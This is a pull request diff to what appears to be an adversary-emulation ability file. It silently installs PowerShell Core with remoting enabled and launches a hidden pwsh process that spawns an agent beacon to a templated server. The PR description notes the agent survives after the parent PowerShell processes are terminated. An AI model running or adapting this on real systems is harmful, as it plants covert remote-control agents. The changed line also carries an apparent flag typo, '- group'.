### PR TITLE
virts-510-adding pwsh to path

### DIFF
--- a/data/abilities/execution/60f63260-39bb-4136-87a0-b6c2dca799fc.yml
+++ b/data/abilities/execution/60f63260-39bb-4136-87a0-b6c2dca799fc.yml
@@ -14,7 +14,8 @@
           $wc=New-Object System.Net.WebClient;
           $output="PowerShellCore.msi";
           $wc.DownloadFile("https://github.com/PowerShell/PowerShell/releases/download/v6.2.2/PowerShell-6.2.2-win-x64.msi", $output);
-          msiexec.exe /package PowerShellCore.msi /quiet ADD_EXPLORER_CONTEXT_MENU_OPENPOWERSHELL=1 ENABLE_PSREMOTING=1 REGISTER_MANIFEST=1;
-          Start-Process powershell -ArgumentList "pwsh -c #{location} -server #{server} -group #{group} -executors pwsh" -WindowStyle hidden;
+          Start-Process msiexec.exe -ArgumentList "/package PowerShellCore.msi /quiet ADD_EXPLORER_CONTEXT_MENU_OPENPOWERSHELL=1 ENABLE_PSREMOTING=1 REGISTER_MANIFEST=1" -Wait;
+          $env:Path += ";C:\Program Files\Powershell\6";
+          Start-Process pwsh -ArgumentList "-c #{location} -server #{server} - group #{group} -executors pwsh" -WindowStyle hidden;
         cleanup: |
           rm PowerShellCore.msi;


### PR DESCRIPTION
added powershell core (pwsh) defaultinstallation path to $env:Path in powershell to allow agent to spawn a beacon in pwsh independent of powershell. Also added a -Wait flag to the installer to ensure that pwsh is installed. After execution of pwsh, powershell processes can be terminated without losing agent.
allow the agent to spawn pwsh